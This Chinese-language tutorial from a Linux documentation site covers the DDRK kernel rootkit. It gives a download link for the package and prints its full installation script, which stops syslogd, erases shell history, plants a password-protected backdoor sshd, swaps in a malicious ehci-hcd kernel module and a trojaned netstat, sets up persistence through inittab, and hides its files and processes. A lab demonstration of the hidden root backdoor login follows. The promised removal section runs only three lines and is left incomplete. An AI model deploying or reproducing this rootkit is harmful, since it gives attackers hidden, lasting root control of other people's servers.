開源互助社區>文檔>Linux

Linux下rootkit-ddrk攻擊獲得root許可權以及清除方法

←手機掃碼閱讀火星人 @ 2014-03-09 , reply:0

DDRK是一個Linux結合shv和adore-ng優點,內核級別的rootkit.

DDRK中包含的文件：

netstat #替換系統中的netstat,從ssh配置文件中讀取埠並隱藏

rk.ko #內核模塊,實現文件和進程的隱藏功能

setup #rootkit安裝文件

tty #ava工具

bin.tgz

---ttymon

---sshd.tgz

---.sh

---shdcf2 #sshd配置文件

---shhk

---shhk.pub

---shrs

---sshd #sshd主程序

DDRK下載地址：http://www.sectop.com/soft/ddrk.tgz

因此只要把這些文件上傳到伺服器上並成功運行,就可以獲得該伺服器的root許可權.為所欲為,無所不能.

setup內容如下：

#!/bin/bash

##########define variables##########

DEFPASS=123456 //默認密碼

DEFPORT=43958 //默認埠

BASEDIR=`pwd`

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE

export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

##########check is root##########

if [ "$(whoami)" != "root" ]; then

echo "BECOME ROOT AND TRY AGAIN"

echo ""

exit

##########extract all tar##########

tar zxf bin.tgz

cd bin

tar zxf sshd.tgz

rm -rf ./sshd.tgz

cd $BASEDIR

rm -rf bin.tgz

cd $BASEDIR

##########kill syslogd##########

killall -9 syslogd >/dev/null 2>&1

sleep 2

##########remove sh.conf##########

if [ -f /etc/sh.conf ]; then

rm -rf /etc/sh.conf //經過md5sum加密過的密碼文件

##########initialize sshd configuration##########

if test -n "$1" ; then

echo "Using Password : $1"

cd $BASEDIR/bin

echo -n $1|md5sum > /etc/sh.conf

else

echo "No Password Specified, using default - $DEFPASS"

echo -n $DEFPASS|md5sum > /etc/sh.conf

touch -acmr /bin/ls /etc/sh.conf

chown -f root:root /etc/sh.conf

if test -n "$2" ; then

echo "Using ssh-port : $2"

echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config

cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf

else

echo "No ssh-port Specified, using default - $DEFPORT"

echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config

cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2

mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf

###########creating dirs##########

SSHDIR=/lib/libsh.so

HOMEDIR=/usr/lib/libsh

if [ -d /lib/libsh.so ]; then

rm -rf /lib/libsh.so

if [ -d /usr/lib/libsh ]; then

rm -rf /usr/lib/libsh/*

mkdir $SSHDIR

touch -acmr /bin/ls $SSHDIR

mkdir $HOMEDIR

touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin

mv .sh/* $SSHDIR/

mv .sh/.bashrc $HOMEDIR

if [ -f /sbin/ttyload ]; then

chattr -AacdisSu /sbin/ttyload

rm -rf /sbin/ttyload

if [ -f /usr/sbin/ttyload ]; then

rm -rf /usr/sbin/ttyload

if [ -f /sbin/ttymon ]; then

rm -rf /sbin/ttymon

mv $SSHDIR/sshd /sbin/ttyload

chmod a xr /sbin/ttyload

chmod o-w /sbin/ttyload

touch -acmr /bin/ls /sbin/ttyload

kill -9 `pidof ttyload` >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon

chmod a xr /sbin/ttymon

touch -acmr /bin/ls /sbin/ttymon

kill -9 `pidof ttymon` >/dev/null 2>&1

cp /bin/bash $SSHDIR

##########modify inittab##########

cp /etc/inittab /etc/.inittab

sed -e 's@^1:2345@0:2345:once:/usr/sbin/ttyloadn&@' /etc/inittab > /etc/.inittab

touch -acmr /etc/inittab /etc/.inittab

mv -f /etc/.inittab /etc/inittab

echo "/sbin/ttyload -q > /dev/null 2>&1" > /usr/sbin/ttyload

echo "/sbin/ttymon > /dev/null 2>&1" >> /usr/sbin/ttyload

echo "${HOMEDIR}/tty i `pidof ttyload` > /dev/null 2>&1" >> /usr/sbin/ttyload

echo "${HOMEDIR}/tty i `pidof ttymon` > /dev/null 2>&1" >> /usr/sbin/ttyload

touch -acmr /bin/ls /usr/sbin/ttyload

chmod 755 /usr/sbin/ttyload

/usr/sbin/ttyload > /dev/null 2>&1

touch -amcr /bin/ls /etc/inittab

###########make sure inittab has modified##########

if [ ! "`grep ttyload /etc/inittab`" ]; then

echo "# WARNING - SSHD WONT BE RELOADED UPON RESTART "

echo "# inittab shuffling probly fucked-up ! "

##########load rk.ko##########

cd $BASEDIR

modprobe -r ehci-hcd

mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko

modprobe ehci-hcd

mv tty $HOMEDIR

##########replace netstat##########

touch -acmr /bin/netstat netstat

mv -f netstat /bin/netstat

##########hide all files and process##########

$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1

$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1

$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1

$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1

$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1

$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1

$HOMEDIR/tty i `pidof ttyload` > /dev/null 2>&1

$HOMEDIR/tty i `pidof ttymon` > /dev/null 2>&1

##########load rk.ko on boot##########

cat > /etc/sysconfig/modules/ehci.modules << EOF

#!/bin/sh

#install usb modules support

modprobe -r ehci-hcd

modprobe ehci-hcd

EOF

touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules

chmod 755 /etc/sysconfig/modules/ehci.modules

$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1

##########check iptables setting##########

if [ -f /sbin/iptables ]; then

echo "`/sbin/iptables -L INPUT | head -5`"

else

echo ""

echo "# lucky for u no iptables found"

##########start syslogd##########

/sbin/syslogd -m 0

# ./setup 123 3333 //設置密碼為123,埠號為3333

Using Password : 123

Using ssh-port : 3333

Chain INPUT (policy ACCEPT)

target prot opt source destination

隱藏效果查看：

查看進程

# ps -ef | egrep -i "ttyload|ttymon"

root 24761 17990 0 13:29 pts/2 00:00:00 egrep -i ttyload|ttymon

查看埠

# netstat -ntplu

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp

0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2117/hpiod

- tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2267/mysqld

tcp 0 0 0.0.0.0:43958 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2134/cupsd

tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2295/sendmail: acce

tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2122/python

udp 0 0 0.0.0.0:32768 0.0.0.0:* 2417/avahi-daemon:

udp 0 0 0.0.0.0:68 0.0.0.0:* 19752/dhclient

udp 0 0 0.0.0.0:5353 0.0.0.0:* 2417/avahi-daemon:

udp 0 0 0.0.0.0:631 0.0.0.0:* 2134/cupsd

查看載入模塊

# lsmod | grep -i ehci-hcd

查看rootkit相關文件

# ls -dl /lib/libsh.so /usr/lib/libsh /etc/sh.conf /sbin/ttyload /sbin/ttymon /bin/ttymon /usr/sbin/ttyload

ls: /bin/ttymon: No such file or directory

-rw-r--r-- 1 2618748389 4063569279

36 Nov 28 2006 /etc/sh.conf

drwxr-xr-x 2 2618748389 4063569279 4096 May 11 13:28 /lib/libsh.so

-rwxr-xr-x 1 2618748389 4063569279 212747 Nov 28 2006 /sbin/ttyload

-rwxrwxr-x 1 2618748389 4063569279 93476 Nov 28 2006 /sbin/ttymon

drwxr-xr-x 2 2618748389 4063569279 4096 May 11 13:28 /usr/lib/libsh

-rwxr-xr-x 1 2618748389 4063569279 171 Nov 28 2006 /usr/sbin/ttyload

查看/etc/inittab文件

# Run gettys in standard runlevels

0:2345:once:/usr/sbin/ttyload

1:2345:respawn:/sbin/mingetty tty1

2:2345:respawn:/sbin/mingetty tty2

3:2345:respawn:/sbin/mingetty tty3

4:2345:respawn:/sbin/mingetty tty4

5:2345:respawn:/sbin/mingetty tty5

6:2345:respawn:/sbin/mingetty tty6

驗證：

已攻破並成功執行的主機

IP為：192.168.27.129

從另一台登錄192.168.27.129,密碼為123,埠號為3333

[root@localhost ~]# ssh 192.168.27.129 -p 3333

root@192.168.27.129's password:

Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1

[sh] w.e.l.c.o.m.e

[sh] To The DoDo's Rootkit

[root@DoDo:/root]#

[root@DoDo:/root]# env

TERM=xterm

SHELL=/bin/bash

SSH_CLIENT=192.168.27.130 38824 3333

SSH_TTY=/dev/pts/3

USER=root

LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:

MAIL=/var/spool/mail/root

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin:/usr/lib/libs:.

PWD=/root

MACHINE=DoDo

PS1=[33[0;36m][$ID@[33[1;37m]$MACHINE[33[0m][33[0;36m]:${PWD}]#[33[0m]

SHLVL=1

HOME=/usr/lib/libsh

ID=root

LOGNAME=root

_=/bin/env

至此,就可以完全控制192.168.27.129了.

到192.168.27.129上查看登錄用戶：

# w

13:40:55 up 3:40, 0 users, load average: 1.23, 0.93, 0.77

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

只有本地用戶.

清除方法：

# cd /usr/lib/libsh

# modprobe -r ehci-hcd

# ./tty u /etc/sysconfig/modules/ehci.modules